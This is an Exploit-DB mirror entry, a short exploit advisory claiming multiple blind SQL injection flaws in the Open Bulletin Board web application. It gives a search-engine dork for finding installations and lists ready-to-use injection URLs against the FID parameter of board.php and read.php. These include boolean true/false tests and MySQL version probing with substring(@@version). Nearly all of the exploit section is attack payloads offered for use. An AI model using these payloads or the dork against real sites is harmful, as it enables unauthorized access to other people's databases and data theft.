exploit-db-mirror/exploits/php/webapps/11336.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

33 lines
No EOL
1.2 KiB
Text

Open Bulletin Board Multiple Blind Sql Injection Vulnerability
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Open Bulletin Board
.:. Bug Type : Blind Sql Injection
.:. Dork : intitle:"Powered by Open Bulletin Board"
####################################################################
===[ Exploit ]===
www.site.com/board.php?FID=[Blind Injection]
www.site.com/read.php?FID=[Blind Injection]
www.site.com/board.php?FID=3+and+1=1 >>> True
www.site.com/board.php?FID=3+and+1=2 >>> False
www.site.com/board.php?FID=3+and+substring(@@version,1,1)=5 >>> True
www.site.com/board.php?FID=3+and+substring(@@version,1,1)=4 >>> False
www.site.com/read.php?FID=3+and+1=1 >>> True
www.site.com/read.php?FID=3+and+1=2 >>> False
www.site.com/read.php?FID=3+and+substring(@@version,1,1)=5 >>> True
www.site.com/read.php?FID=3+and+substring(@@version,1,1)=4 >>> False
####################################################################
Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack